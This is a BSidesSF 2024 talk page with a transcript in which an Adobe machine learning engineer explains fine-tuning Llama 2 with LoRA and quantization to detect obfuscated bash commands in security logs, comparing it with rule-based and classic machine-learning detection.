Finetuning Large Language Models (LLMs) for Security Log Detections

Name: Finetuning Large Language Models (LLMs) for Security Log Detections
Uploaded: 2024-07-09
Duration: 25 min 10 s
Description: Wilson Tang explores fine-tuning open-source large language models for security log detection, moving beyond traditional rule-based signatures. Using command obfuscation detection as a case study, he demonstrates how to adapt pre-trained LLMs to classify malicious log patterns through parameter-effi

BSidesSF · 202425:10492 viewsPublished 2024-07Watch on YouTube ↗

Speakers

Wilson Tang

Tags

CategoryTechnical

TopicAI Security Detection Engineering Threat Intel

StyleTalk

About this talk

Wilson Tang explores fine-tuning open-source large language models for security log detection, moving beyond traditional rule-based signatures. Using command obfuscation detection as a case study, he demonstrates how to adapt pre-trained LLMs to classify malicious log patterns through parameter-efficient fine-tuning techniques like LoRA, while discussing trade-offs between model size, compute requirements, and detection accuracy.

Show original YouTube description

Finetuning Large Language Models (LLMs) for Security Log Detections Wilson Tang Traditional security log detections look for pre-defined signatures in log data, which doesn’t generalize well for more sophisticated detection types. In this talk, we will explore how to finetune a popular open-source Large Language Model (LLM) for specific security log detection use cases. https://bsidessf2024.sched.com/event/63627738f62b42ba511fed6efa5bfe83

Show transcript [en]

thanks everyone uh I'm going to start this presentation off with a little poll so please raise your hands if you've ever played with chat GPT or any LM yep at this point I expect most of the room to have their hands up uh keep your hands up actually uh so keep your hands up if you use chat or any llm for that matter about like once a week cool still see most of the hands here how about twice a weekish every other day cool less hands but still like about half the room how about every day or like most days you use Chachi BT LMS wow that's a good amount of the room yeah you can go ahead and put your hands down

now I just wanted to get a quick pulse of how familiar we are with LMS and also just show how cool how prevalent kind of is now like if we think about this in the context two years ago this llm term wasn't even widely known one year ago chat GPT was just released a couple months a ago and we're just starting to see how cool it was and now we're starting to get to this point where we're trying to deeply integrate llms into our workflows and yeah as a machine learning engineer pretty excited about that um yeah so today I'm going to talk about one way we can integrate llms into our security workflows and we're going

to explore this idea of fine-tuning llms for security log detections so just a quick introduction of who I am before I start I'm Wilson Tang I go by Heim pronouns I'm a proud second generation Asian-American and also quick shout out it actually happens to be my mom's birthday birthday today so and she's watching from home so happy birthday Mom thanks everyone and cool so in my current role I'm a machine learning engineer in our threat hunting team at Adobe I attained my master's degree in computer science from the University of Washington in 2022 and some of my hobbies include cooking love to cook traveling love to eat new food and new places and video gaming love to play this game called

valerant all right quick agenda what I'm gonna go over today I'm going to talk about traditional security log detections and kind of some of its limitations and the way I'm going to go about it is go into this case study of command ausc detection and then we're going to go into a brief llm overview and then talk about how we're going to find tun LMS specifically for command aisc detection and then I'm going to make some generalizations for other use cases we can start to think about so let's dive right into it uh let's talk about traditional security log detections and when we think about this we're usually thinking in this rule-based realm where we're looking at

our log events and we're looking for certain signatures predefined signatures in the events uh for example like is this process executing some known malware is this login coming from some blacklisted ASN all these sort of things but what if our uh detection uh needs something more sophisticated with it needs something a little more quote unquote Dynamic I know that's a pretty loaded term could be used very gimmicky but here I'm just trying to talk about ways that we're trying to write detections that can't be easily written in a simple query and here at Adobe and our threat hunting team uh we're trying to use machine learning to address some of these concerns and combat this and

now with this big llm boom we're seeing a lot of use cases mainly for text generation so we're looking at mostly like personal assistance uh uh stuff like that and but in this project we're going to look at how we can leverage llms or can we Leverage llms for classification task and specifically can we leverage llms for classifying our security log detections correctly and now I'm going to start talking our specific case study in command officiation detection all right so before we can actually start detecting it uh let's just go over what it is so we understand what it is so command officiation is a technique to make a standard command line intentionally difficult to read but

still execute the same functionality so in this example here this comes from a talk from a couple years ago that was really good on offc um so you have this uh sample command light up here and then in the off skated part uh you can see there's a bunch of special characters but both of them will still execute the same functionality and the main danger here really is that we can have a lot of these mature detections on our uh command lines but a lot of them could be uh rendered basically useless if an attacker is able to off youate their commands maybe slightly maybe a lot and it would evade some of these certain

detections and just a side note not all officiation is uh malicious they are definitely operational use cases of this for example maybe using like base 64 encoding to uh shorten these command lines but just so we know the nature of it there and also in this presentation we're just going to talk about detecting ofus we're not going to be concerned with Dofus skating any commands uh but that is also another pretty cool use case we can start think about leveraging llms for too all right now I'm going to dive into some other techniques other than fine-tuning llms uh uh for detecting this command Opus station some of it will contain some machine learning so at

this point uh don't be I'm going to go over it sort of quickly so don't be too um don't worry about understanding it completely all the way through I'm just trying to get a big picture of what other techniques exist so we can understand why we are we are leveraging fine tuning here as well so first way not machine learning but maybe more in the stat rule security log detection space we can think about just doing some rule based logic here so for example we can ask the question does this command line contain a specific percentage of special characters maybe like 50 70 80% something like that and hopefully by that question alone you're kind of

seeing that it's not super flexible we'll need a lot of manual tuning maybe more rules maybe more sophisticated rules to get well uh just to get it right but at the end we might not be able to curate a good set of questions and uh to actually detect officiation because it is a pretty big a broad realm and it won't necessarily generalize well for all sets of offc so now let's jump into some machine learning techniques uh we're going to start with a simple one called logistic regression and in a very crude summary uh this can you can boil it down to like a learned equation that outputs a probability between 0 and one and that's

sort of Illustrated here in this diagram on the right where this is the logistic regession line and you have your group of data that's closer to one and you have a group of data that's closer to zero and you can imagine that like maybe the office gated one uh data is like on the towards the one and non-office gate is towards the zero and basically with this process of logistic regression we're just trying to learn this equation that would get us to this uh scenario and how we're going to get there is that we're going to go through this process of feature engineering and what we're going to do is we're going to choose certain features in the data that we

think are important for classification so for example maybe U character frequency matter so like the frequency of the letter A B C all the way down to Z maybe we care about the frequency of special characters like semicolon commas periods maybe we care about the strength length maybe we care about entropy like the randomness of a string maybe we care about white space density you can go on list and experiment with all and this is the process of feature engineering and then when you have your nicely curious set of features you're going to pass it into the logistic regression equation it's going to try its best to learn the weights to match the uh match the data

and hopefully at the end you'll get some sort of representation that looks like this nice diagram on the right but in a lot uh in more simple cases you're going to get to here but in more complicated cases you're not going to necessarily get to this spot it really relies on just having a really nice set of curated features but also something important to note for this specific uh uh uh point is that uh logistic regression will start to fail when you pass too many uh features into it so that's why we're trying to think about more solutions here so now let's step a little closer into the LM round and we're going to talk about more traditional quotequote

traditional deep learning even though it's a sort of still kind of New Field um what we're going to do in this deep learning approach is that we're going to use this thing called neural networks and then what'll let us use is that we're not going to need to do any of this like feature Engineering in deep learning uh we're really only going to need to pass in a vector representation of the data and what I mean by that it's much more simpler than the feature engineering so in the sample here we're going to give it the who am I bash command and then convert it into some characters uh so you can imagine that each number corresponds to each

character in the command line so w is the 24th letter in the alphabet H is the 15th o is the 20th um and then so on and you have this num numerical vectorized representation of data and then what you're going to do with this vectorized data is that you're going to pass it through this thing called a neural network which I'm also going to say it in a really crude summary it's boiled down it's a giant matrix multiplication operation and then at the end you're going to get an output that's either um either office gate or not and what we get out of here is that we get more generalization uh out than the logistic

regression technique and we don't need to do any feature engineering but the hard part of deep learning is going to be experimenting with different model architectures and trying to find the right model architecture that'll actually fit our data well and that's where we're going to jump into um llms so uh two main things have really enabled LM to go far and the first thing is this thing called the Transformer architecture and if you don't know that is uh it's highlighted in this paper called attention is all you need from 2017 and this is an amazing paper to read I'm not going to go into the details of this in this presentation but it's a great paper to understand the

basis of how llms work and yeah it's still how it's being done today like just stacking more Transformer layers on top of each other uh so it's a really good way to understand the context uh and the second thing that really enabled LM to go farest because of this Transformer architecture primarily is that we're able to train on terabytes of data and many days weeks of GPU time so on the right this is an older data set of of llama one from meta uh this is one of the popular ones that actually open source release their data sets of what they train on in the exact proportions and the dis size and everything and you

see L one train on terabytes at this point the newer models probably train on hundreds of terabytes maybe even pedabytes at this point who knows at this point um but yeah there's a lot of data that goes into this so where I'm trying to get to with why we're trying to go for this fine-tuning approach is because there's really no need to quote unquote reinvent the wheel and what I mean by that is that uh it's pretty costly pretty time assuming to pre-train these models from scratch so what we can do to simplify this process is we can uh take the model checkpoints from the internet and then we can do this fine-tuning process by

continuing to train the model on our own custom data set and this data set when we fine-tune can be relatively small because the model's already pre-trained it already understands language we just need to pass in some smaller data to actually tweak the parameters in the model to make it work on our data set so next I'm going to go through a sample temp code review um walk through uh so I'm don't want really want you to be too um nitty-gritty about understanding the complexities of every code bit I just want you to understand the overarching concepts behind the code so you understand what the this whole process of fine tuning entails so the first thing what we want

to do is that we got to get our data set first so in this context of command officiation Maybe we can do something like grab some command line events from our environment run some open source or manual officiation tools to create some synthetic data or maybe grab some office gate commands if uh if we got them and then we can create some template prompts with these commands with uh as to create our training samples so in this example up here this is a simpler illustration of what your prompt can be we can go into the specifics of maybe prompt engineering here but not going to touch on that here but here for this prompt uh

we split out into some sections so like the first one is the description of the problem so below is an instruction that describes a binary classification task for command ociation detection then we'll follow up with an instruction prompt so analyze the following bash command line if the command is OBS skate output yes or the command is not OBS skate output no and the input will pass in the command line and then the output will be yes or no you can imagine if the input was obate we would want the output to say yes instead so we can train on this and here now that you see this uh training example you can see this is a

sort of hacky approach to simulate binary classification this isn't like the traditional way that we might think of binary classification like we see in like the logistic regression example we we're just trying to Output a probability between 0 and one here this is a more hacky approach as to say hey we want the output to be yes or no from the llm and now let's actually go into the code to do um some of this importing uh from importing the llm so the LM specifically we're going to use in this presentation is llama 27b at this point it's already outdated at this point there's llama 3 out here and every week it seems like there's a new LM being

released boasting the uh best benchmarks we're also looking into um Microsoft 53 right now because pretty small LM pretty good and also this is going to come from hugging face uh which is if you don't know what hugging face is it's a popular uh open source or popular repo kind of like GitHub specifically for machine learning models and data sets all right so before we actually import it uh let's set up some quantization to reduce our GPU memory usage and why this is necessary is that these models even like 7B is going to take a lot of GPU memory and why it does is because uh regularly uh these llms are going to be storing four bytes per

parameter which means the Precision of the model like each parameter each weight or each number if you'll if you'll go with me on this each number in the model is going to be four bytes and prec so if you have 7 billion parameters Time 4 byes parameter that's going to take 28 GB GPU of GPU memory just to import the model that's not even including any of the data that we need to put into the GPU as well and that's a lot of GP a lot of GPU memory like we're not going to need we're not going to be able to use a lot of like kamay gpus we're going to need the more expensive

ones like the a100 h100s um so if we want to be able to leverage some cheaper gpus we got to set up some quantization so what that means is that we're going to reduce the Precision from about four bytes to four bits instead which is substantially less so you got 7 billion parameters times 4 bits parameter and we'll get like 3.5 gigabyt of GPU memory and that's much less memory that we have and this is just some config to set that there and next we're going to import the tokenizer from llama 2 and what the tokenizer is going to do for us is that it's going to do this uh vectorization of the data for us so we don't need to

manually do oursel imagine back at that deep laring side we were doing the who I am and convert it into that Vector ourselves this tokenizer will be uh importing tokenizers will be able to do this for us and it's just not it's not just more convenient for us but it is quite necessary to do this because latu was trained on its own tokenized representations of the data so we can't just pass in our own tokenized examples and expect it to work because it just won't so we are going to have to use l tokenizer for the model to work here and this is just some code to um import it important thing is probably just the

model repo name at the top um other parameters not going to talk about and then finally we're going to import this model from hugging face so say model repo name and then pass in the quantization config uh to get the model in and quantized and now one best practice before we actually start running the fine tuning is actually to test the model outputs before doing any fine tuning because if the LM actually just works out of the box on our task then there's really no need to fine tune it ourselves so what we're going to do here is that we're going to run our raw text to the tokenizer and the raw text you can

imagine is that template prompt from a couple slides back uh except that we're going to remove the output uh section so no yes or no just output and then blank because that's what we want the model to generate for us and then uh there's a line in there that's like Max new tokens equals one that means we just want the model to Output one new token in the output so we just want the uh model to Output yes or no in our example and all these other nice parameters that we can do and finally we can print out the outputs do some stats on it and get some bar metrics before we start and finally load in the data set

get a train data set get a test data set train data set we actually train on test data set we actually run some youal on and now let's talk about how we're actually going to run the fine-tuning and the first way we're going to do it is this method called parameter efficient fine-tuning PFT and this means we're only going to fine-tune with a small number of model parameters so instead of fine-tuning on just the on all the 7even billion parameters uh we're only concerned with fine-tuning uh small number of params because that's going to make our process faster and that's all we really need uh PFT is a popular hugging face repo that contains multiple methods for fine-tuning and uh

the more popular uh implementation of this is called Laura which which is low rank adaptation and this is a technique to reduce the number of parameters being fine toed with Matrix low rank operations and that's all about I'll say about it uh it'll get very mathematical try to explain it um but for the purpose of this talk we're just going to say that and this is a popular uh way to do it and this is just a way to Defi and in the code this is some a common configs that you set for Laura and then finally we're going to prepare our training arguments so pass in some per device training batch size gradient accumulation learning rates Max

steps that's super important but you'll get some training arguments and then finally we'll pass it put it all together and pass it into our trainer so pass in our model pass in our training data set pass in our PF config our tokenizer and training args and finally we'll run trainer. train and trainer. train depending on how big your GPU is uh how big your data set is how fast your GPU is it could take a matter of minutes to fine tune it could take a matter of hours to fine tune that's the end uh you'll get uh your final finetune model and then finally we'll uh you can run your model outputs after that run

some metrics on it like we did before and see how your model improved after that and hopefully uh after going through this amount of code uh you can we can start talking about some of the advantages of fine tuning uh compared to the other methods so uh first uh Advantage is that uh we really abstract most of these traditional machine learning processes away just by starting with a pre-trained model so what I mean by this is that uh we don't really need need to do the feature engineering because we're kind of in this deep learning realm there's no model architecture experimentation because we're using the Straight model from llama so we don't need to play with the

architecture we're just using its model architecture uh there's no more manual vectorization we're just going to use the model's pre-trained tokenizer instead and all we're really concerned about here is providing the model uh with our raw data set instead and one other note to um emphasize here is that with fine-tuning llms we're more concerned about the data quality so passing in good quality data to actually um fine-tune our model on uh because that is the most important part here and not to say that that doesn't exist in other ml problems it actually does there's a saying that in ml data quality data ation is the most important step in machine learning so you should always

concentrate um on that um and but with the a fine you can abstract a lot of the other process away and just focus on the data set itself so I just went and tried to convince you on how fine tuning is a great approach but this really wouldn't be a fair or a complete presentation if I didn't give you some of the trade-offs of using fine-tuning llms and the first trade-off uh I'm going to say is that do we really need all these 7 billion parameters for this classification and I'm going to go ahead and say probably not um these 7 billion parameters are really good for generating text like and necessary for generating text but when

we're talking about classifying data where we just need a yes or no uh we might not necessarily need all these s billion parameters uh to get the correct classification out of it uh and typically this is going to require more GPU memory time even though it's substantially less and trying to pre-train an LM from scratch we're still going to need that U still going to need a GPU and some GPU Cycles to actually fine-tune the model but even with these tradeoffs These are kind of the tradeoffs we make for quote unquote ease of use uh abstract these ml processes away uh just thring our data set at the LM and fine-tuning uh we make we're it's easier

to use we just need to throw a little more um compute at it which I mean money is also tough too at this point um with so many CPUs out there and but what I really want you to get out of this is that uh even though it's not the most perfect approach every approach is going to have his tradeoffs fine-tuning is just this new tool that we can consider when we're developing uh security log detections uh so as a good machine learning engineer maybe as a good security practitioner uh we should be leveraging considering all our uh all our tools and all different approaches we can use for developing these detections so uh and then we can make a

good good clear final decision at the end after we evaluate it all so just some closing thoughts here uh applying this for other uh use cases you can uh generally just replicate most of these steps just kind of copy paste um for your own various use cases and replace the data set with your own uh to be very honest out here uh this uh code very similarly uh you can find in many open source rubos many blog posts online this fine-tuning approach through the hugging face library is pretty uh standardized out there and a lot of people are doing similar things uh but if you want to get more up uh see this presentation uh in particular uh and you

want to U stay in touch with this I'm going to be posting updates on this so you can add me on LinkedIn uh you can stay tuned I'll be doing more updates and I'll at least post this bsid talk if you're curious about this code as well um so yeah I hope you at least learned something one new thing out of this present and deepen your perspectives on llm year thanks for listening and I'll go to the slide out [Applause] now well that was amazing thank you so much Mr Tang uh we do have one question um as a machine learning engineer how do you think AI will affect the security industry and future jobs that is a loaded question um I'll

talk about it in um the context of the security log detections I think that um I I I think it'll really help Propel us to do new types of detections so not just llms but talking about stuff like anomaly detection and also all the other machine learning approaches that I think it'll just enable our security analyst to have more tools to do more mature types of detection um so I think there might just grow the security industry more and just make us more um

mature fantastic answer well thank you so much Mr Tang we really appreciate you coming out and presenting um we actually have something special just for you and for our audience if you have further questions for him please feel free to meet him up in the City View area um and our gifts are actually coming from socket security this year one of our main sponsors and we are so grateful for that um obviously we couldn't do this without our volunteers and our sponsors so we much appreciate it and we really appreciate you coming out sir thank you so much fabulous job fabulous yeah so we would

Finetuning Large Language Models (LLMs) for Security Log Detections

Related talks